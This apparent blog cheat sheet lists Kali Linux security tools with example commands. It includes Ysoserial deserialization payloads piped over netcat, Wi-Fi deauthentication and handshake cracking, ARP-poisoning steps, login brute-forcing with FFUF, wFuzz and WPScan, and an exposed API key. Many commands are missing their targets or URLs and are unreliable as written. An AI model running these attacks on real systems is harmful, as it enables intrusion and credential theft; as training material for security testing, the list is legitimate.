Reference List
    1. Lynis
    2. BeEF
    3. Autopsy
    4. King Phisher
    5. Yersinia
    6. SocialEngineeringToolkit
    7. Ettercap
    8. Bettercap
    9. AirCrack-ng
    10. LazyRecon
    11. Wapiti
    12. SpiderFoot
    13. Ysoserial
    14. NoSQLMap
    15. MobSF
    16. JADX
    17. Frida
    18. Recon-ng
    19. WPScan
    20. Naabu
    21. FFUF
    22. wFuzz
    23. DirSearch
    24. SubFinder
    25. HTTPx
    26. EyeWitness

Lynis – An auditing tool for Unix-based systems. It scans the system by performing many security control checks [Link].

sudo apt install lynis
sudo lynis audit system
sudo lynis -Q --cronjob

BeEF – It is classified as a penetration testing tool that focuses on the web browser but in fact, it is a very malicious tool that can be used to exploit web vulnerabilities. The phishing features are incredible and mimic GMail or Facebook login pages for example [Link].

sudo apt install beef-xss
sudo beef-xss

It is going to ask for the new password.

On the browser go to The default user is beef.

Autopsy – A digital forensic tool used by law enforcement officials to investigate what happened on your computer, drive, and flash drives [Link].

sudo autopsy


sudo autopsy &

On the browser go to http://localhost:9999/autopsy.

King Phisher – A tool for Phishing Awareness Campaign [Link].

sudo systemctl start postgresql
sudo systemctl start king-phisher
cd /usr/share/king-phisher/
sudo ./KingPhisherServer server_config.yml

If port 80 is being in use you will have to kill the process (e.g. 123456):

sudo netstat -tulpn
sudo kill 123456

Leave it running in one terminal and on another terminal:

cd /usr/share/king-phisher

Kali Linux already has it installed and it is accessible from the main menu.

Yersinia – A DHCP Starvation attacking tool. One attached can make the DHCP server inoperative and act as the DHCP server of the network, usually assigning itself as the DNS server and directing the users to malicious websites [Link].

sudo apt install yersinia
sudo yersinia -G

SocialEngineeringToolkit – SET is an open-source penetration testing framework with a big number of custom attack vectors [Link].

sudo setoolkit

Ettercap – Man-in-the-middle attack tool using ARP poisoning [Link].

  • Select the interface(s) used for the attack, and click on the button accept,
  • Scan the network for hosts, list them, and add the targets to the target groups 1 and 2,
  • On the MITM, select ARP poisoning,
  • If not started, start the sniffing,
  • Now check the ARP table on both devices and compare it to the real ones,
  • On the man-in-the-middle box, use Wireshark or TCP Dump for example to capture the packets being transmitted between both targets.

Bettercap – Alternative to Ettercap, with additional features such as WIFI [Link].

sudo apt install bettercap
sudo bettercap --iface wlan0
>> wifi.recon on
>> events.ignore
>> set net.sniff.output handshake.pcap
>> net.sniff on
>> events.ignore net.sniff.802.11
>> 11
>> wifi.deauth FF:FF:FF:FF:FF:FF
>> events.ignore wifi.client.probe

AirCrack-ng – It consists of a detector, packet sniffer, WEP/WPA/WPA2-PSK cracker, and analysis tool for 802.11 [Link].

sudo apt install aircrack-ng
sudo aircrack-ng handshake.pcap -w /usr/share/wordlists/rockyou.txt.gz

LazyRecon – It is a very straightforward scanner intended to automate some tedious tasks of reconnaissance and information gathering in an HTML report format [Link].

git clone
./ -d -e

Wapiti – A web application security scanner. It performs “black-box” scans (it does not study the source code) on the web application by crawling the webpages looking for scripts and forms where it can inject data in an HTML report format [Link].

wapiti -u

SpiderFoot – It uses OSINT to gather information about a specific target of an investigation. It crawls the websites looking for IPs,
domains/sub-domain, hostnames, network subnets (CIDR), autonomous system numbers (ASN), e-mails, phone numbers, usernames, person’s name, and bitcoin address. Then, using 200+ modules it can gatter even more information about it. For example, transactions and balance of the acquired Bitcoin addresses [Link].

sudo spiderfoot -m sfp_spider,sfp_bitcoin,sfp_blockchain -s -F BITCOIN_ADDRESS,BITCOIN_BALANCE -q
sudo spiderfoot -m sfp_spider,sfp_ethereum -s -F ETHEREUM_ADDRESS -q

Ysoserial – A collection of utilities used for exploiting Java applications performing unsafe deserialization of objects and using vulnerable libraries in order to get remote code execution [Link].

java -jar ysoserial.jar CommonsCollections4 ncat 8888 > payload
cat payload | nc 123456

First Ysoserial was used to create a Java payload according to the chosen vulnerability and remote command to be executed. Then the payload was fired up on the netcat connection (where the example’s vulnerable application was listening on).

NoSQLMap – A tool designed to automate injection attacks and exploit default configuration weaknesses in NoSQL databases (such as MongoDB) and web apps using NoSQL [Link].

git clone

MobSF – Mobile Security Framework is a mobile application (Android/iOS/Windows) malware analyzer. It is capable of performing static and dynamic analysis in a sandbox and generate reports [Link].

git clone
cd Mobile-Security-Framework-MobSF

Then go to the web browser and access http://localhost:8000/.

Upload the app file (APK, for example) and play with the functionalities.

JADX – It is a (CLI and GUI) tool for producing Java source code (decompiler) from Android Dex and Apk files [Link]. See also the Dex2Jar [Link] and JAD [Link].

sudo apt install jadx
jadx app.apk

Frida – A toolkit for developers, reverse-engineers, and security researchers. It is a dynamic binary instrumentation framework [Link].

pip install frida-tools


docker run --security-opt seccomp:unconfined -it name_of_the_docker /bin/bash

Basic commands:

  • frida-ps
    • List all running processes names and PIDs running.
  • frida-ps -U
    • List on a USB device.
  • frida-ls-devices
    • List all attached devices.
  • frida-trace -U Twitter -i “recv*”
    • Traces native APIs.

Recon-ng – It is a web reconnaissance framework designed exclusively for web-based open source [Link].

> marketplace search contacts
> marketplace install recon/domains-contacts/whois_pocs
> modules load recon/domains-contacts/whois_pocs
  > info
  > options unset SOURCE
  > options set SOURCE
  > run
  > back
> marketplace search domain
> marketplace install recon/domains-hosts/bing_domain_web
> modules load recon/domains-hosts/bing_domain_web
  > options set SOURCE
  > run
> marketplace search google
> marketplace install recon/domains-hosts/google_site_web
> modules load recon/domains-hosts/google_site_web
  > options set SOURCE
  > run
> arketplace search interesting
> marketplace install discovery/info_disclosure/interesting_files
> modules load discovery/info_disclosure/interesting_files
  > options set PORT 443
  > options set PROTOCOL https
  > run
> shell ls ~/.recon-ng/workspaces/default/
> marketplace search shodan
> marketplace install recon/domains-hosts/shodan_hostname
> keys add Y9yraMjfdgUTSy9Z5okhnDQeWadPw2dP
> modules load recon/domains-hosts/shodan_hostname
  > options set SOURCE
  > run
> show hosts
> show contacts
> workspaces create new
> show hosts
> workspaces list
> workspaces load default
> db schema
> db delete hosts
> db insert hosts
> marketplace search report
> marketplace install reporting/html
> modules load reporting/html
  > options set CREATOR MyName
  > options set CUSTOMER MyClient
  > run
> exit

Web Interface

locate recon-web

WPScan – A free WordPress security scanner [Link].

wpscan --update
wpscan --url
wpscan --url --enumerate p
wpscan --url --enumerate u
wpscan --url --enumerate t
wpscan --url --enumerate tt
wpscan --url --proxy
wpscan --url --wordlist word.lst --threads 50 --username admin

Naabu – A simple and fast ports for enumerating valid ports using fast SYN scan on the host/list of hosts [Link].

docker pull projectdiscovery/naabu
docker run -it projectdiscovery/naabu -host -silent
docker run -it projectdiscovery/naabu -host -silent -p -
docker run -it projectdiscovery/naabu -host -silent -iL hosts.txt
docker run -it projectdiscovery/naabu -host -silent -nmap-cli 'nmap -sV'
docker run -it projectdiscovery/naabu -host -silent -o output.txt
docker run -it projectdiscovery/naabu -host -silent -interface eth0
docker run -it projectdiscovery/naabu -host -silent -source-ip

FFUF – Fuzzing tool for web applications [Link].

sudo apt install golang-go
go get -u
~/go/bin/ffuf -V


sudo apt install ffuf
ffuf -V


ffuf -u -w word.lst
ffuf -u -w word.lst
ffuf -u -w word.lst -c
ffuf -u -w word.lst -sf
ffuf -u -w word.lst -recursion -e .bak
ffuf -u -w word.lst -s -of html -o output.txt
ffuf -u -w domain.lst:W1 -w word.lst:W2
ffuf -u -X POST -d "username=W1\&password=W2" -w users.lst:W1 -w passes.lst:W2
ffuf -u -w word.lst -x http://proxy:port
ffuf -u -w word.lst -x socks5://

wFuzz – Another fuzzing tool for web applications [Link].

wfuzz -c --hc 404 -w word.lst
wfuzz -c -z file,users.lst -z file,passes.lst -d "log=FUZZ&pwd=FUZ2Z"

DirSearch – x [Link].

git clone
cd dirsearch
pip3 install -r requirements.txt
./ -u
./ -e php,asp,cgi -w word.lst -r -R 5 -t50 -m POST --data "username=admin" -u

SubFinder – Designed to discover valid subdomains using passive online sources [Link].

sudo apt install subfinder -y
subfinder -d
subfinder -d -silent 
subfinder -v -d 
subfinder -dL domains.txt

HTTPx – x [Link].

git clone; cd httpx/cmd/httpx; go build; sudo mv httpx /usr/local/bin/; httpx -version
echo | httpx
echo | httpx -silent
subfinder -d -silent | httpx -silent

EyeWitness – Automates taking screenshots of websites and provide server headers [Link].

sudo apt install eyewitness
eyewitness -f list.txt